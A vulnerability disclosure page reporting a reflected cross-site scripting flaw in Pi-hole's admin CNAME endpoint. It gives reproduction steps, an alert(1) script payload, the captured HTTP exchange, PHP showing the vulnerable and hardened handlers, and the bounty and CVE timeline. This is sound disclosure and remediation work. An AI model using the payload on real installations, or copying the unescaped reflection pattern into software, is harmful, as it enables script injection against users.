Cross-site Scripting (XSS) - Reflected in pi-hole/adminlte


Reported on

Sep 1st 2021

✍️ Description

Reflected XSS in POST /admin/scripts/pi-hole/php/customcname.php

🕵️‍♂️ Proof of Concept

  1. Log in as admin, go to Local DNS -> CNAME Records -> Add a new CNAME record.
  2. Input <script>alert(1)</script> in the domain field and anything in the target domain field.
  3. The payload in the POST body's domain parameter is URL-encoded; use a proxy like Burp to manually replace it with the decoded value.
POST /admin/scripts/pi-hole/php/customcname.php HTTP/2
Cookie: persistentlogin=***; persistentlogin=***; PHPSESSID=***
Content-Length: 109
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="92"
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9

HTTP/2 200 OK
Server: nginx/1.21.1
Date: Wed, 01 Sep 2021 10:36:59 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 78
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Pi-Hole: The Pi-hole Web interface is working!
X-Frame-Options: DENY
Strict-Transport-Security: max-age=31536000

{"success":false,"message":"Domain '<script>alert(1)<\/script>' is not valid"}

💥 Impact

Reflected XSS on POST parameter "domain".
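The response above shows the two ingredients of the bug: the JSON error message is served as text/html, and json_encode() leaves the reflected domain's < and > characters intact. The following is an added illustration, not pi-hole/adminlte code and not the fix merged in f52671 (which this page does not reproduce); the handler shape, function names and the is_valid_domain() helper are assumptions made for the example.

```php
<?php
// Added illustration, not pi-hole/adminlte code. The handler shape,
// function names and is_valid_domain() are assumptions made for this example.

function is_valid_domain(string $domain): bool
{
    // Hostname syntax only: labels of letters, digits and hyphens joined by dots.
    // Anything containing '<', '>', quotes or spaces is rejected here.
    return strlen($domain) <= 253
        && preg_match('/^([a-z0-9-]{1,63}\.)*[a-z0-9-]{1,63}$/i', $domain) === 1;
}

// Vulnerable shape: no Content-Type is set, so PHP's default text/html applies,
// and json_encode() without flags keeps '<' and '>' literally, so an invalid
// "domain" value is reflected into the body as live markup.
function customcname_vulnerable(string $domain): string
{
    if (!is_valid_domain($domain)) {
        return json_encode(['success' => false,
                            'message' => "Domain '$domain' is not valid"]);
    }
    return json_encode(['success' => true, 'message' => '']);
}

// Hardened shape: declare the body as JSON so the browser never renders it as
// HTML, forbid MIME sniffing, and hex-escape HTML-significant characters inside
// the JSON strings ('<' becomes \u003C, '>' becomes \u003E) so the reflected
// value stays inert even if a client later injects the message into the DOM.
function customcname_hardened(string $domain): string
{
    header('Content-Type: application/json; charset=UTF-8');
    header('X-Content-Type-Options: nosniff');
    $flags = JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT;
    if (!is_valid_domain($domain)) {
        return json_encode(['success' => false,
                            'message' => "Domain '$domain' is not valid"], $flags);
    }
    return json_encode(['success' => true, 'message' => ''], $flags);
}

// Entry point: read the POST parameter named in the report and answer safely.
$domain = $_POST['domain'] ?? '';
echo customcname_hardened($domain);
```

JSON.parse() on the client restores the \u003C escapes to the original characters, so the existing JavaScript that reads "message" keeps working while the raw response is no longer interpretable as HTML.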

We have contacted a member of the pi-hole/adminlte team and are waiting to hear back (a year ago)
wtwver submitted a (a year ago)
Adam Warner validated this vulnerability (a year ago)
wtwver has been awarded the disclosure bounty
The fix bounty is now up for grabs
Adam Warner confirmed that a fix has been merged on f52671 (a year ago)
wtwver has been awarded the fix bounty (a year ago)


@admin Could you assist in issuing a CVE? Thanks a lot

Jamie Slome
a year ago


We are able to issue a CVE here, we just need double confirmation from the maintainer that they are happy for this to go ahead.


Adam Warner
a year ago



Jamie Slome
a year ago


CVE published! 🎉

Adam Warner
a year ago

